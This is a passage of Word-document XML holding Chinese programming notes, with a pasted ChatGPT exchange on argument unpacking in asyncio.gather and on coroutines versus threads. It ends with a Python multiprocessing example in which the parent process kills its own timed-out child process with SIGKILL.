          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面为什么要写一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474E95DB" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD7BBFD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B53B30C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，星号（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）有两种常见的用法：在函数定义中用于接收任意数量的位置参数（称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可变长度参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在函数调用中用于将列表、元组或其他可迭代对象解包为位置参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0508C0E9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDD4D56" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在你的例子中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ECB9E7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA4AEB5" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF1CCA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F902C59" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = loop.run_until_complete(asyncio.gather(*task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590250A9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DD46D3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的星号是用于解包的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个列表，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.gather(*tasks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受的是多个任务（多个参数），而不是一个列表。星号将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表解包为多个参数，传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.gather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2E7EA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B7DEFD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你不使用星号，就像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F267CE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5684FFC9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47559377" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39072714" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = loop.run_until_complete(asyncio.gather(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627304DA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718E102F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会收到一个参数，这个参数是一个列表。这将导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试并发运行这个列表，而不是列表中的任务。这将导致错误，因为列表本身不是一个任务或协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720FD7FA" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64DD8A3A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，你需要使用星号将列表解包为多个参数，这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以接收到多个任务，将它们并发运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CCF61" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C7CD3" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>携程是不是可以代替多线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD9A86" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADC16C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E235A8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>coroutine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和多线程都是实现程序并发的方法，但它们有一些重要的区别，并不总是可以互相替代。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79315DAC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E3820C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，协程和线程运行在不同的环境中：协程运行在单个线程中，而多线程程序在多个线程中运行。协程通过在一个线程中切换上下文（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来模拟并发，而多线程程序使用操作系统的线程来实现并发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400FC39" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D8E5E9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程的优点是它们比线程更轻量级，创建和销毁协程的开销比创建和销毁线程的开销小。此外，协程由程序员明确地控制，可以更精细地控制何时进行切换，而线程的切换通常由操作系统控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8CEE6" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77260A52" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然而，协程的一个重要限制是它们在单个线程中运行，不能利用多核处理器。这意味着，如果你的程序是计算密集型的（比如，它需要执行大量的数学运算），那么使用多线程或者多进程可能会更好。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0966D18C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2767D1CA" w14:textId="48818EBF" w:rsidR="00D127A1" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以，是否使用协程或多线程取决于你的具体需求。如果你的程序是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型的（比如，它需要处理网络请求或数据库查询），那么使用协程可能会更有效。如果你的程序是计算密集型的，那么可能需要使用多线程或多进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4160A3BC" w14:textId="77777777" w:rsidR="000016EE" w:rsidRDefault="000016EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4445BD36" w14:textId="77777777" w:rsidR="000016EE" w:rsidRDefault="000016EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5A7D3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="538" w:name="_Toc159779975"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多进程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="538"/>
    </w:p>
    <w:p w14:paraId="127710CC" w14:textId="77777777" w:rsidR="00E340BB" w:rsidRDefault="00E340BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D1F2ED" w14:textId="78D93F27" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="539" w:name="_Toc159779976"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>multiprocessing.Process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
    </w:p>
    <w:p w14:paraId="3E75D55E" w14:textId="77777777" w:rsidR="00E340BB" w:rsidRDefault="00E340BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B280F2C" w14:textId="3EB5A7AD" w:rsidR="00A723A9" w:rsidRDefault="00A723A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定时间内杀死进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FCB096" w14:textId="77777777" w:rsidR="00A723A9" w:rsidRDefault="00A723A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A4767DB" w14:textId="6D75FFC1" w:rsidR="00A723A9" w:rsidRDefault="00355BFD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码，进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身会自杀，而且主程序也会手动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ill </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB388E9" w14:textId="77777777" w:rsidR="00A723A9" w:rsidRDefault="00A723A9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09572DE7" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import multiprocessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7088A2E6" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DE434C" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC88A43" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import signal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CE30A" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394EC10A" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def worker():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D505E46" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子进程开始</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, PID: ", os.getpid())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D5B67" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE84C31" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBFE278" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755FFA4B" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        elapsed_time = time.time() - start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12143E" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果已经运行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟，则结束</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169F7840" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if elapsed_time &gt; 20*60:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4EE1D" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子进程结束</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, PID: ", os.getpid())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BFB796" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2C271" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        time.sleep(1) # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每秒检查一次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A57CC" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A6F26B" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AECD62" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    p = multiprocessing.Process(target=worker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A12A0" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    p.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C795EDD" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17391CDA" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待一段时间，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514A580" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    time.sleep(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DCBDD" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06227EC8" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>杀死子进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466798C" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主进程结束子进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, PID: ", p.pid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A51E739" w14:textId="77777777" w:rsidR="00463BC9" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    os.kill(p.pid, signal.SIGKILL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832D011" w14:textId="532036D2" w:rsidR="00E340BB" w:rsidRDefault="00463BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    p.join()  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待进程终止</w:t>
      </w:r>
    </w:p>
